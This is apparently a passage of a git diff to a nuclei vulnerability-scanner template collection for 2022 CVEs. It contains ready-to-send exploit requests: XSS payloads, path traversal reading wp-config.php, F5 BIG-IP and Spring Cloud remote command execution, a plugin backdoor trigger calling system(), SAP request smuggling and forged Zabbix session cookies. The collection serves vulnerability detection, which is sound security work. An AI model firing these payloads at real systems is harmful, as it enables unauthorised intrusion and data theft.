"{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'here' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-0692.yaml b/nuclei-templates/CVE-2022/CVE-2022-0692.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-0692.yaml rename to nuclei-templates/CVE-2022/CVE-2022-0692.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-0776.yaml b/nuclei-templates/CVE-2022/CVE-2022-0776.yaml new file mode 100644 index 0000000000..153fbe5e2b --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-0776.yaml @@ -0,0 +1,31 @@ +id: CVE-2022-0776 +info: + name: RevealJS postMessage XSS + author: LogicalHunter + severity: medium + description: Cross-site Scripting (XSS) - DOM in GitHub repository hakimel/reveal.js prior to 4.3.0. + reference: + - https://hackerone.com/reports/691977 + - https://github.com/hakimel/reveal.js/pull/3137 + - https://huntr.dev/bounties/be2b7ee4-f487-42e1-874a-6bcc410e4001/ + classification: + cve-id: CVE-2022-0776 + tags: cve,cve2022,headless,postmessage,revealjs +headless: + - steps: + - args: + url: "{{BaseURL}}" + action: navigate + - action: waitload + - action: script + name: extract + args: + code: | + () => { + return (Reveal.VERSION <= "3.8.0" || Reveal.VERSION < "4.3.0") + } + matchers: + - type: word + part: extract + words: + - "true" diff --git a/nuclei-templates/CVE-2022/CVE-2022-0870.yaml b/nuclei-templates/CVE-2022/CVE-2022-0870.yaml deleted file mode 100644 index b1aa655570..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0870.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2022-0870 -info: - name: Gogs - SSRF - author: Akincibor - severity: medium - description: Server-Side Request Forgery (SSRF) in Gogs prior to 0.12.5. - reference: - - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-0870 - - https://github.com/gogs/gogs/commit/91f2cde5e95f146bfe4765e837e7282df6c7cabb - - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2022-0870 - cwe-id: CWE-918 - metadata: - shodan-query: http.favicon.hash:-449283196 - tags: cve,cve2022,ssrf,gogs -requests: - - method: GET - path: - - "{{BaseURL}}" - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - '
\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' - - type: regex - group: 1 - regex: - - '
\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - '
\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' - - type: dsl - dsl: - - compare_versions(version, '< 0.12.5') - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1040.yaml b/nuclei-templates/CVE-2022/CVE-2022-1040.yaml new file mode 100644 index 0000000000..5d4bea1f07 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-1040.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-1040 +info: + name: Sophos Firewall <=18.5 MR3 - Remote Code Execution + author: For3stCo1d + severity: critical + description: | + Sophos Firewall version v18.5 MR3 and older contains an authentication bypass vulnerability in the User Portal and Webadmin which could allow a remote attacker to execute code. + reference: + - https://github.com/killvxk/CVE-2022-1040 + - https://github.com/CronUp/Vulnerabilidades/blob/main/CVE-2022-1040_checker + - https://nvd.nist.gov/vuln/detail/CVE-2022-1040 + - https://www.sophos.com/en-us/security-advisories/sophos-sa-20220325-sfos-rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-1040 + cwe-id: CWE-287 + metadata: + verified: true + shodan-query: http.title:"Sophos" + tags: cve,cve2022,sophos,firewall,auth-bypass,rce,kev +requests: + - method: POST + path: + - "{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"\U0001F99E\":\"test\"}" + headers: + X-Requested-With: "XMLHttpRequest" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{\"status\":\"Session Expired\"}" + - type: word + part: header + words: + - "Server: xxxx" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1119.yaml b/nuclei-templates/CVE-2022/CVE-2022-1119.yaml new file mode 100644 index 0000000000..9f39aee98b --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-1119.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-1119 +info: + name: WordPress Simple File List <3.2.8 - Local File Inclusion + author: random-robbie + severity: high + description: | + WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files. + reference: + - https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e + - https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606 + - https://plugins.trac.wordpress.org/browser/simple-file-list/trunk/includes/ee-downloader.php?rev=2071880 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1119 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-1119 + cwe-id: CWE-22 + tags: cve,cve2022,lfi,wordpress,wp,wp-plugin +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1221.yaml b/nuclei-templates/CVE-2022/CVE-2022-1221.yaml deleted file mode 100644 index ca0ab04ccb..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-1221.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2022-1221 -info: - name: Gwyn's Imagemap Selector <= 0.3.3 - Reflected Cross-Site Scripting - author: veshraj - severity: medium - description: | - The Gwyn's Imagemap Selector Wordpresss plugin does not sanitize the id and class parameters before returning them back in attributes, leading to a Reflected Cross-Site Scripting. - reference: - - https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-1221 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: xss,wordpress,wp-plugin,wp,cve,cve2022 -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - " popup-" - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1388.yaml b/nuclei-templates/CVE-2022/CVE-2022-1388.yaml new file mode 100644 index 0000000000..62a06938bc --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-1388.yaml @@ -0,0 +1,57 @@ +id: CVE-2022-1388 +info: + name: F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter + author: Mrcl0wn + severity: critical + description: "CVE-2022-1388 is an authentication bypass vulnerability in the REST \ncomponent of BIG-IP’s iControl API that was assigned a CVSSv3 \nscore of 9.8. The iControl REST API is used for the management and \nconfiguration of BIG-IP devices. CVE-2022-1388 could be exploited \nby an unauthenticated attacker with network access to the management \nport or self IP addresses of devices that use BIG-IP. Exploitation would \nallow the attacker to execute arbitrary system commands, create and \ndelete files and disable services.\n" + reference: + - https://github.com/alt3kx/CVE-2022-1388_PoC + - https://support.f5.com/csp/article/K23605346 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388 + - https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md + - https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py + - https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ip + - https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.yaml + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2022-1388 + cwe-id: CWE-306 + metadata: + shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" + verified: true + tags: bigip,mirai,rce,cve,cve2022 +variables: + auth_var: "admin:" + cmd_var: "{{CMD}}" +requests: + - raw: + - | + POST /mgmt/tm/util/bash HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive, X-F5-Auth-Token + X-F5-Auth-Token: a + Authorization: Basic {{base64(auth_var)}} + Content-Type: application/json + + { + "command": "run", + "utilCmdArgs": "-c 'id;cmd_var'" + } + extractors: + - type: regex + part: body + name: result_command + group: 1 + regex: + - "\"commandResult\":\"(.*)\"" + matchers: + - type: word + words: + - "commandResult" + - "uid=" + - "{{cmd_var}}" + - type: status + status: + - 200 + condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-1392.yaml b/nuclei-templates/CVE-2022/CVE-2022-1392.yaml deleted file mode 100644 index 1cfaf712bd..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-1392.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2022-1392 -info: - name: WordPress Videos sync PDF <=1.7.4 - Local File Inclusion - author: Veshraj - severity: high - description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion. - reference: - - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 - - https://packetstormsecurity.com/files/166534/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-1392 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-1392 - metadata: - verified: true - tags: cve,cve2022,lfi,wp-plugin,wp,wordpress,unauth -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "failed to open stream: No such file or directory" - - "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php" - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1609.yaml b/nuclei-templates/CVE-2022/CVE-2022-1609.yaml new file mode 100644 index 0000000000..70e48868d8 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-1609.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-1609 +info: + name: The School Management < 9.9.7 - Remote Code Execution + author: For3stCo1d + severity: critical + description: The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site. + reference: + - https://wpscan.com/vulnerability/e2d546c9-85b6-47a4-b951-781b9ae5d0f2 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609 + metadata: + verified: false + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: CVE-2022-1609 + cwe-id: CWE-77 + tags: cve,cve2022,wordpress,rce,wp,backdoor +variables: + cmd: "echo CVE-2022-1609 | rev" +requests: + - raw: + - | + POST /wp-json/am-member/license HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + blowfish=1&blowf=system('{{cmd}}'); + matchers-condition: and + matchers: + - type: word + part: body + words: + - '9061-2202-EVC' + +# Enhanced by mp on 2022/05/27 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1904.yaml b/nuclei-templates/CVE-2022/CVE-2022-1904.yaml deleted file mode 100644 index 44550af381..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-1904.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2022-1904 -info: - name: Easy Pricing Tables < 3.2.1 - Reflected Cross-Site-Scripting - author: Akincibor - severity: medium - description: | - The plugin does not sanitize and escape parameter before reflecting it back in a page available to any user (both authenticated and unauthenticated) when a specific setting is enabled, leading to a reflected cross-site scripting. - reference: - - https://wpscan.com/vulnerability/92215d07-d129-49b4-a838-0de1a944c06b - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1904 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-1904 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2022,wp-plugin,xss,wp,wordpress -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=' - matchers-condition: and - matchers: - - type: word - part: body - words: - - ' - Color' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1906.yaml b/nuclei-templates/CVE-2022/CVE-2022-1906.yaml deleted file mode 100644 index 0de7988bdc..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-1906.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2022-1906 -info: - name: Copyright Proof <= 4.16 - Reflected Cross-Site-Scripting - author: random-robbie - severity: medium - description: | - The plugin does not sanitise and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users, leading to a Reflected Cross-Site Scripting when a specific setting is enabled. - reference: - - https://wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338 - - https://nvd.nist.gov/vuln/detail/CVE-2022-1906 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1906 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-1906 - cwe-id: CWE-79 - metadata: - google-dork: inurl:/wp-content/plugins/digiproveblog - verified: "true" - tags: cve,cve2022,wordpress,xss,wp-plugin,wp -requests: - - raw: - - | - GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - matchers-condition: and - matchers: - - type: word - part: body - words: - - "got message " - condition: and - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-21500.yaml b/nuclei-templates/CVE-2022/CVE-2022-21500.yaml new file mode 100644 index 0000000000..bfd9bb4211 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-21500.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-21500 +info: + name: Oracle E-Business Suite <=12.2 - Authentication Bypass + author: 3th1c_yuk1,tess + severity: high + description: | + Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. + reference: + - https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac + - https://twitter.com/GodfatherOrwa/status/1514720677173026816 + - https://www.oracle.com/security-alerts/alert-cve-2022-21500.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-21500 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-21500 + metadata: + shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 + verified: "true" + tags: cve,cve2022,oracle,misconfig,auth-bypass +requests: + - method: GET + path: + - '{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp' + matchers-condition: and + matchers: + - type: word + words: + - 'Registration' + - 'Register as individual' + - '' + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2187.yaml b/nuclei-templates/CVE-2022/CVE-2022-2187.yaml deleted file mode 100644 index 26f13b2649..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-2187.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2022-2187 -info: - name: Contact Form 7 Captcha < 0.1.2 - Reflected Cross-Site Scripting - author: For3stCo1d - severity: medium - description: | - The Contact Form 7 Captcha WordPress plugin before 0.1.2 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers - reference: - - https://wpscan.com/vulnerability/4fd2f1ef-39c6-4425-8b4d-1a332dabac8d - - https://wordpress.org/plugins/contact-form-7-simple-recaptcha - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2187 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-2187 - cwe-id: CWE-79 - tags: cve,cve2022,wordpress,xss,wp-plugin,wp -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&">' - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "Contact Form 7" - condition: and - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-22536.yaml b/nuclei-templates/CVE-2022/CVE-2022-22536.yaml deleted file mode 100644 index 6afb76b607..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-22536.yaml +++ /dev/null @@ -1,63 +0,0 @@ -id: CVE-2022-22536 - -info: - name: SAP Memory Pipes (MPI) Desynchronization - author: pdteam - severity: critical - description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-22536 - - https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022 - - https://github.com/Onapsis/onapsis_icmad_scanner - - https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2022-22536 - cwe-id: CWE-444 - metadata: - shodan-query: http.favicon.hash:-266008933 - tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes,kev - -requests: - - raw: - - |+ - GET {{sap_path}} HTTP/1.1 - Host: {{Hostname}} - Content-Length: 82646 - Connection: keep-alive - - {{repeat("A", 82642)}} - - GET / HTTP/1.1 - Host: {{Hostname}} - - payloads: - sap_path: # based on https://github.com/Onapsis/onapsis_icmad_scanner - - /sap/admin/public/default.html - - /sap/public/bc/ur/Login/assets/corbu/sap_logo.png - - unsafe: true - read-all: true - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: dsl - dsl: - - "contains(tolower(body), 'administration')" # confirms 1st path - - "contains(tolower(all_headers), 'content-type: image/png')" # confirms 2nd path - condition: or - - - type: word - part: body - words: - - "HTTP/1.0 400 Bad Request" # error in concatenated response - - "HTTP/1.0 500 Internal Server Error" - - "HTTP/1.0 500 Dispatching Error" - condition: or - -# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-22954.yaml b/nuclei-templates/CVE-2022/CVE-2022-22954.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-22954.yaml rename to nuclei-templates/CVE-2022/CVE-2022-22954.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-22963.yaml b/nuclei-templates/CVE-2022/CVE-2022-22963.yaml new file mode 100644 index 0000000000..f28360d6a7 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-22963.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-22963 + +info: + name: CVE-2022-22963 - Spring Cloud RCE + author: rdnt + severity: critical + description: RCE on Spring cloud function SPEL + tags: cve,rce,spring,cve2022,injection + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-770 + +requests: + - method: POST + path: + - "{{RootURL}}/functionRouter" + - "{{RootURL}}/api/functionRouter" + - "{{RootURL}}/api/v1/functionRouter" + - "{{RootURL}}/../../../../../../functionRouter" + - "{{RootURL}}/../../../../../../;functionRouter" + - "{{RootURL}}/spring/functionRouter" + - "{{RootURL}}/admin/functionRouter" + - "{{RootURL}}/../../../../../../../../functionRouter" + - "{{RootURL}}../../../../../../../../api/functionRouter" + - "{{RootURL}}../../../../../../../../api/v1/functionRouter" + - "{{RootURL}}%2f%2e%2e%2f%2e%2e%2ffunctionRouter" + - "{{RootURL}}%2fspring%2ffunctionRouter" + - "{{RootURL}}%2fadmin%2functionRouter" + headers: + spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("") + Content-Type: application/x-www-form-urlencoded + body: exp + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'functionRouter' + - type: status + status: + - 500 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-22972.yaml b/nuclei-templates/CVE-2022/CVE-2022-22972.yaml deleted file mode 100644 index f0934ac0fe..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-22972.yaml +++ /dev/null @@ -1,93 +0,0 @@ -id: CVE-2022-22972 -info: - name: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass - author: For3stCo1d,princechaddha - severity: critical - description: | - VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. - reference: - - https://github.com/horizon3ai/CVE-2022-22972 - - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive - - https://www.vmware.com/security/advisories/VMSA-2022-0014.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-22972 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22972 - cwe-id: CWE-287 - metadata: - fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" - tags: cve,cve2022,vmware,auth-bypass,oast -requests: - - raw: - - | - GET /vcac/ HTTP/1.1 - Host: {{Hostname}} - - | - GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1 - Host: {{Hostname}} - - | - POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1 - Host: {{interactsh-url}} - Content-type: application/x-www-form-urlencoded - - protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in - redirects: true - max-redirects: 3 - cookie-reuse: true - extractors: - - type: regex - part: body - name: protected_state - group: 1 - regex: - - 'id="protected_state" value="([a-zA-Z0-9]+)"\/>' - internal: true - - type: regex - part: body - name: horizonRelayState - group: 1 - regex: - - 'name="horizonRelayState" value="([a-z0-9-]+)"\/>' - internal: true - - type: regex - part: body - name: userstore - group: 1 - regex: - - 'id="userstore" value="([a-z.]+)" \/>' - internal: true - - type: regex - part: body - name: userstoreDisplay - group: 1 - regex: - - 'id="userstoreDisplay" readonly class="login-input transparent_class" value="(.*)"/>' - internal: true - - type: regex - part: body - name: stickyConnectorId - group: 1 - regex: - - 'name="stickyConnectorId" value="(.*)"/>' - internal: true - - type: kval - part: header - name: HZN-Cookie - kval: - - 'HZN' - matchers-condition: and - matchers: - - type: word - part: header - words: - - "HZN=" - - type: status - status: - - 302 - - type: word - part: interactsh_protocol - words: - - "http" - -# Enhanced by mp on 2022/06/01 diff --git a/nuclei-templates/CVE-2022/CVE-2022-23131.yaml b/nuclei-templates/CVE-2022/CVE-2022-23131.yaml deleted file mode 100644 index 40b9b42d62..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-23131.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2022-23131 - -info: - name: Zabbix - SAML SSO Authentication Bypass - author: For3stCo1d,spac3wh1te - severity: critical - description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified. - reference: - - https://support.zabbix.com/browse/ZBX-20350 - - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage - - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 - - https://github.com/1mxml/CVE-2022-23131 - remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-23131 - cwe-id: CWE-290 - metadata: - fofa-query: app="ZABBIX-监控系统" && body="saml" - shodan-query: http.favicon.hash:892542951 - tags: cve,cve2022,zabbix,auth-bypass,saml,sso,kev - -requests: - - method: GET - path: - - "{{BaseURL}}/zabbix/index_sso.php" - - "{{BaseURL}}/index_sso.php" - - headers: - Cookie: "zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 302 - - - type: dsl - dsl: - - "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')" - -# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/CVE-2022-23134.yaml b/nuclei-templates/CVE-2022/CVE-2022-23134.yaml deleted file mode 100644 index d3252104e3..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-23134.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2022-23134 - -info: - name: Zabbix Setup Configuration Authentication Bypass - author: bananabr - severity: medium - description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend. - reference: - - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage - - https://nvd.nist.gov/vuln/detail/CVE-2022-23134 - - https://support.zabbix.com/browse/ZBX-20384 - - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SZYHXINBKCY42ITFSNCYE7KCSF33VRA/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N - cvss-score: 5.3 - cve-id: CVE-2022-23134 - tags: cve,cve2022,zabbix,auth-bypass,kev - -requests: - - method: GET - path: - - "{{BaseURL}}/zabbix/setup.php" - - "{{BaseURL}}/setup.php" - - headers: - Cookie: "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "Database" - - "host" - - "port" - - "Zabbix" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-23347.yaml b/nuclei-templates/CVE-2022/CVE-2022-23347.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-23347.yaml rename to nuclei-templates/CVE-2022/CVE-2022-23347.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-23779.yaml b/nuclei-templates/CVE-2022/CVE-2022-23779.yaml new file mode 100644 index 0000000000..d6c672d774 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-23779.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-23779 + +info: + name: Zoho ManageEngine - Internal Hostname Disclosure + author: cckuailong + severity: medium + description: Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses. + reference: + - https://www.manageengine.com/products/desktop-central/cve-2022-23779.html + - https://github.com/fbusr/CVE-2022-23779 + - https://nvd.nist.gov/vuln/detail/CVE-2022-23779 + metadata: + fofa-query: app="ZOHO-ManageEngine-Desktop" + classification: + 